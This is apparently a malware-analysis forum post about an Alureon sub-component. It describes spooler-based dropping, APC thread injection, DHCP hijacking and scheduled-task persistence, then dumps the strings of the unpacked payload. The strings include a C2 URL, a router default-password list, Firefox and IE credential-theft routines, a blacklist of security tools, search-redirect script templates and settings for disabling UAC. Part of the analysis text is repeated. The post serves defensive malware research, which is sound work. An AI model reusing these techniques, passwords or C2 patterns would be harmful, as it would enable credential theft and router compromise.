This sub component of Alureon family looks untrivial :) Seems to be this one what we were talking about long time ago here.
http://www.kernelmode.info/forum/viewto ... =19&p=2696
http://www.virustotal.com/file-scan/rep ... 1288521202
Drops itself as usual through spooler and then uses NtQueueApcThread based injection (ernel32.dll) + NtResumeThread splicing.
As payload - modifies the DHCP registry to point to a malicious DHCP server. Contains list of default passwords (e.g. administrator, router etc).
Run itself as job through Task Scheduler
551ffeb7.job hxxp://www.birungueta.blogspot.com Blog do Birungueta c:\documents and settings\UserName\application data\551ffeb7.exe
Trying to contact few malicious URL's (addresses hardcoded in binary).
Contains some sort of security tools blacklist.
http://www.kernelmode.info/forum/viewto ... =19&p=2696
http://www.virustotal.com/file-scan/rep ... 1288521202
Drops itself as usual through spooler and then uses NtQueueApcThread based injection (ernel32.dll) + NtResumeThread splicing.
As payload - modifies the DHCP registry to point to a malicious DHCP server. Contains list of default passwords (e.g. administrator, router etc).
Run itself as job through Task Scheduler
551ffeb7.job hxxp://www.birungueta.blogspot.com Blog do Birungueta c:\documents and settings\UserName\application data\551ffeb7.exe
Trying to contact few malicious URL's (addresses hardcoded in binary).
Contains some sort of security tools blacklist.
mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exeUnpacked payload dll internals
CONTENT-LENGTH:
------------------------
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/ http://%s/%s GET SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d 1406 %s\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d AppEvents\Schemes\Apps\Explorer\Navigating\.current SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}\ %s InfSection cmbatt_inst explorer.exe InstallDate SOFTWARE\Microsoft\Windows NT\CurrentVersion %c-%08X-%X%X%X%X %c-%08X-defaultx 10.0.0.10 about.blank default none %s;%d.%d;%s;%s;%s;%d;%s;%s;%d;%s;%s;%s http\shell\open\command version software\microsoft\internet explorer defaut: %s
ie: %s
nav()
timeout(10000)
java(;)
hxxp://93.174.90.26/bsfk.php die ENDOFBLOCK getgrab ok
advapi32.dll CredFree CredEnumerateA abe2869f-9b47-4cd9-a358-c22904dba7f7 %ws login.php login_fail.php login_auth.asp login_fail.asp login.html firstuse.lp login.lp h t t p : / / % S / % S %s\Software\Microsoft\Internet Explorer\IntelliForms\Storage%d Software\Microsoft\Internet Explorer\IntelliForms\Storage%d %s:%s pstorec.dll PStoreCreateInstance : S t r i n g D a t a Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;
epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234 CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox 3.5 3.6 \Main %s\%s%s Install Directory mozcrt19.dll sqlite3.dll nspr4.dll plc4.dll
plds4.dll nssutil3.dll softokn3.dll nss3.dll %s\%s NSS_Init PK11_GetInternalKeySlot PK11_Authenticate NSSBase64_DecodeBuffer PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown
sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text \Mozilla\Firefox\Profiles\* signons.sqlite select * from moz_logins NetFriendContainer %X
LOCATION: // SERVER: urn:schemas-upnp-org:device:InternetGatewayDevice:1 urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1 239.255.255.250 M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST: %s
MAN: "ssdp:discover"
MX: %d
manufacturer modelName modelNumber controlURL http http://%s:%d%s <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetSpecificPortMappingEntry" upnperror <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="%s"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#AddPortMapping" <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="%s"></m:GetExternalIPAddress></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetExternalIPAddress" NewExternalIPAddress POST Content-Type: application/x-www-form-urlencoded %s
%s Authorization: Basic %s http://microsoft.com/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ %s%s
SeTcbPrivilege %08x %X%X%X%X mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe iexplore.exe firefox.exe safari.exe opera.exe svchost.exe netsvcs spoolsv.exe spooler \%s.dll <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
%s.manifest open .exe kernel32.dll ernel32.dll LoadLibraryExA T r i g g e r 1 G o o g l e DhcpNameServer NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%s %d.%d.%d.%d,%d.%d.%d.%d WSPStartup msafd mswsock //tag: //img: &q= %s%c%s=%s%s%s Set-Cookie: kw=%s http://google.com/ j.js http://%d.%d.%d.%d/%s?m=4&a=%d&i=%s&u=%s .google. search.yahoo. search.msn. search.live. altavista.com ask.com search.aol. saerch.aol. search.icq. alltheweb.com bing.com yandex.ru rambler.ru go.mail.ru sm.aport.ru /search? /custom? /ie? /url? search. /search results.asp /web/results? /web? /results.php? /yandsearch? /scripts/template.dll? / .youtube. .wikipedia. .yahoo. rds.yahoo. overture. .yimg.com wikimedia. amazon.com hotmail. .msn.com .live.com microsoft. altavista. atdmt.com wzus1.ask. /i/i.gif? opselect.com aolcdn aolsearch .aol. revsci.net atwola. digitalcity. .icq. o.aolcdn.com alltheweb. bing. .yandex. tns-counter. .rambler. .rl0.ru .begun. list.ru .mail.ru z5x.net imgsmail.ru .aport. yadro.ru .ag.ru <html><head><meta http-equiv="refresh" content="10;url=%s">
<script>window.status="%s";</script>
<script src="http://%s:%d/%s?m=3&a=%d&i=%s&u=%s"></script>
Connection: Close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: HTTP/1.1 200 OK
%s%d
%s <script>click="<html><body onLoad='document.main.submit()'>%s<form action='%s' name='main' method='post'";if(top.location==parent.location) click+="target='_parent'";document.write(click+"></body></html>");</script>
HTTP/1.0 307 Temporary Redirect
%s0
Location: %s
Content-Length: ETag: Cookie: kw= & GET results5.google. /url?sa=t&source=web Host: http://%s%s Referer: /favicon.ico dynvolume.com %s\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\ %s\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer | WUStatusServer %d.%dX%s;%d;%d;%s http://%s/kx.php \%s.exe Global\%s %s%d \ernel32.dll UacDisableNotify software\microsoft\Security Center EnableLUA SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System defaultid NtResumeThread
Attachments
pass: malware
(45.17 KiB) Downloaded 76 times
(45.17 KiB) Downloaded 76 times
Ring0 - the source of inspiration